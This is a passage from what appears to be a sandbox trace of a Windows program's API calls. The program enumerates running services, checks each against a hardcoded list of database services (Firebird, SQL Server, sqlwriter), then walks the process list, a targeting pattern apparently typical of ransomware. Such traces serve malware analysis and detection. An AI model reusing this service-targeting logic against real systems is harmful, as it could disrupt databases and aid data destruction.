lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a418 [0313.698] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0313.699] GetLastError () returned 0xea [0313.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0313.699] EnumServicesStatusExW (in: hSCManager=0x401a418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0313.700] CloseServiceHandle (hSCObject=0x401a418) returned 1 [0313.700] lstrlenW (lpString="Appinfo") returned 7 [0313.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0313.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0313.701] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0313.701] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0313.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0313.701] lstrlenW (lpString="AppXSvc") returned 7 [0313.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0313.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0313.701] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0313.701] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0313.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0313.701] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0313.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0313.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0313.701] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0313.701] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0313.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0313.701] lstrlenW (lpString="Audiosrv") returned 8 [0313.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0313.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0313.701] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0313.701] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0313.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0313.701] lstrlenW (lpString="BFE") returned 3 [0313.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0313.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0313.702] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0313.702] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0313.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0313.702] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0313.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0313.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0313.702] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0313.702] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0313.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0313.702] lstrlenW (lpString="CDPSvc") returned 6 [0313.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0313.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0313.702] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0313.702] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0313.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0313.702] lstrlenW (lpString="ClickToRunSvc") returned 13 [0313.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0313.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0313.702] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0313.702] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0313.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0313.703] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0313.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0313.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0313.703] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0313.703] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0313.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0313.703] lstrlenW (lpString="CryptSvc") returned 8 [0313.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0313.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0313.703] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0313.703] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0313.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0313.703] lstrlenW (lpString="DcomLaunch") returned 10 [0313.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0313.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0313.703] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0313.703] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0313.703] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0313.703] lstrlenW (lpString="DeviceAssociationService") returned 24 [0313.703] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0313.703] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0313.703] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0313.704] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0313.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0313.704] lstrlenW (lpString="Dhcp") returned 4 [0313.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0313.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0313.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0313.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0313.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0313.704] lstrlenW (lpString="Dnscache") returned 8 [0313.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0313.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0313.704] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0313.704] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0313.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0313.704] lstrlenW (lpString="DPS") returned 3 [0313.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0313.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0313.704] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0313.704] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0313.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0313.704] lstrlenW (lpString="DusmSvc") returned 7 [0313.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0313.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0313.704] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0313.704] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0313.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0313.705] lstrlenW (lpString="EventLog") returned 8 [0313.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0313.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0313.705] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0313.705] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0313.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0313.705] lstrlenW (lpString="EventSystem") returned 11 [0313.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0313.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0313.705] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0313.705] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0313.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0313.705] lstrlenW (lpString="FontCache") returned 9 [0313.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0313.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0313.705] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0313.705] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0313.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0313.705] lstrlenW (lpString="gpsvc") returned 5 [0313.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0313.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0313.705] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0313.705] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0313.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0313.705] lstrlenW (lpString="iphlpsvc") returned 8 [0313.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0313.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0313.706] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0313.706] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0313.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0313.706] lstrlenW (lpString="KeyIso") returned 6 [0313.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0313.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0313.706] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0313.706] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0313.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0313.706] lstrlenW (lpString="LanmanServer") returned 12 [0313.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0313.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0313.899] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0313.899] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0313.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0313.899] lstrlenW (lpString="LanmanWorkstation") returned 17 [0313.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0313.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0313.900] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0313.900] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0313.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0313.900] lstrlenW (lpString="lfsvc") returned 5 [0313.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0313.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0313.900] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0313.900] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0313.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0313.900] lstrlenW (lpString="lmhosts") returned 7 [0313.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0313.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0313.900] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0313.900] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0313.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0313.900] lstrlenW (lpString="LSM") returned 3 [0313.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0313.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0313.900] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0313.900] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0313.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0313.900] lstrlenW (lpString="MpsSvc") returned 6 [0313.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0313.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0313.900] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0313.900] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0313.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0313.901] lstrlenW (lpString="NcbService") returned 10 [0313.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0313.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0313.901] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0313.901] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0313.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0313.901] lstrlenW (lpString="netprofm") returned 8 [0313.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0313.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0313.901] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0313.901] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0313.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0313.901] lstrlenW (lpString="NgcSvc") returned 6 [0313.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0313.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0313.902] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0313.902] lstrlenW (lpString="NlaSvc") returned 6 [0313.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0313.902] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0313.902] lstrlenW (lpString="nsi") returned 3 [0313.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0313.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0313.902] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0313.902] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0313.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0313.902] lstrlenW (lpString="PcaSvc") returned 6 [0313.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0313.902] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0313.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0313.902] lstrlenW (lpString="PlugPlay") returned 8 [0313.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0313.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0313.903] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0313.903] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0313.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0313.903] lstrlenW (lpString="Power") returned 5 [0313.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0313.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0313.903] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0313.903] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0313.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0313.903] lstrlenW (lpString="ProfSvc") returned 7 [0313.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0313.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0313.903] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0313.903] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0313.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0313.903] lstrlenW (lpString="RpcEptMapper") returned 12 [0313.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0313.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0313.903] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0313.904] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0313.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0313.904] lstrlenW (lpString="RpcSs") returned 5 [0313.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0313.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0313.904] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0313.904] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0313.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0313.904] lstrlenW (lpString="SamSs") returned 5 [0313.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0313.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0313.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0313.904] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0313.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0313.904] lstrlenW (lpString="Schedule") returned 8 [0313.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0313.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0313.904] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0313.904] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0313.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0313.904] lstrlenW (lpString="SecurityHealthService") returned 21 [0313.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0313.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0313.904] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0313.905] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0313.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0313.905] lstrlenW (lpString="SENS") returned 4 [0313.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0313.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0313.905] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0313.905] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0313.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0313.905] lstrlenW (lpString="ShellHWDetection") returned 16 [0313.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0313.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0313.905] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0313.905] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0313.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0313.905] lstrlenW (lpString="Spooler") returned 7 [0313.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0313.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0313.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0313.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0313.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0313.905] lstrlenW (lpString="StateRepository") returned 15 [0313.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0313.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0313.905] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0313.906] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0313.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0313.906] lstrlenW (lpString="SysMain") returned 7 [0313.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0313.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0313.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0313.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0313.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0313.906] lstrlenW (lpString="SystemEventsBroker") returned 18 [0313.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0313.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0313.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0313.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0313.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0313.906] lstrlenW (lpString="Themes") returned 6 [0313.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0313.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0313.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0313.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0313.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0313.906] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0313.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0313.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0313.906] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0313.906] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0313.907] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0313.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x420 [0313.914] Process32FirstW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0313.915] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0313.915] lstrlenW (lpString="System") returned 6 [0313.915] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0313.916] lstrlenW (lpString="smss.exe") returned 8 [0313.916] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0313.917] lstrlenW (lpString="csrss.exe") returned 9 [0313.917] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, 